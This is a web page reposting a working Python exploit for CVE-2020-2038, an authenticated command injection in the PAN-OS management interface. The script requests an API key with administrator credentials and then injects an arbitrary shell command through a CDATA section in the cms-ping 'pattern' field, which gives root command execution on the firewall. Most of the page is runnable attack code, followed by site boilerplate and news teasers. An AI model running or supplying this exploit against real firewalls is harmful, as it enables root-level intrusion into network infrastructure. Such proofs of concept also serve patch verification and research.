A Remote Code Execution vulnerability (Authenticated) was discovered in PAN-OS 10.0 by security researcher UND3SC0N0C1D0
# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: UnD3sc0n0c1d0
# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
# Category: Web Application
# Version: <10.0.1, <9.1.4 and <9.0.10
# Tested on: PAN-OS 10.0 - Parrot OS
# CVE : CVE-2020-2038
#
# Description:
# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
# administrators to execute arbitrary OS commands with root privileges.
# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.
#!/usr/bin/env python3
import requests
import urllib3
import sys
import getopt
import xmltodict
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print('\n###########################################################################')
print('# Proof of Concept for CVE-2020-2038 #')
print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #')
print('# Positive Technologies #')
print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
print('# #')
print('# Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #')
print('###########################################################################')
def exploit(target,user,password,command):
apiparam = {'type': 'keygen', 'user': user, 'password': password}
apiresponse = requests.get(target+'api/', params=apiparam, verify=False)
xmlparse = xmltodict.parse(apiresponse.content)
apikey = xmlparse['response']['result']['key']
payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||'+command+'||]]></pattern></cms-ping>'
parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
response = requests.get(target+'api', params=parameters, verify=False)
print(response.text[50:-20])
def usage():
print('\nusage: CVE-2020-2038.py\n\n')
print('arguments:')
print(' -h show this help message and exit')
print(' -t target URL (ex: http://vulnerable.host/)')
print(' -u target administrator user')
print(' -p pasword of the defined user account')
print(' -c command you want to execute on the target\n')
def main(argv):
if len(sys.argv) < 9:
banner()
usage()
sys.exit()
try:
opts, args = getopt.getopt(argv,"ht:u:p:c:")
except getopt.GetoptError:
banner()
usage()
sys.exit()
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
if opt == '-t':
target = arg
if opt == '-u':
user = arg
if opt == '-p':
password = arg
if opt == '-c':
command = arg
banner()
exploit(target,user,password,command)
sys.exit()
if __name__ == "__main__":
try:
main(sys.argv[1:])
except KeyboardInterrupt:
print('Interrupted by users...')
except:
sys.exit()
Suggest an edit to this article
Go to Cybersecurity Knowledge Base
Got to the Latest Cybersecurity News
Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.
Remember, CyberSecurity Starts With You!
This post was last modified on 9 August 2022 1:12 PM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment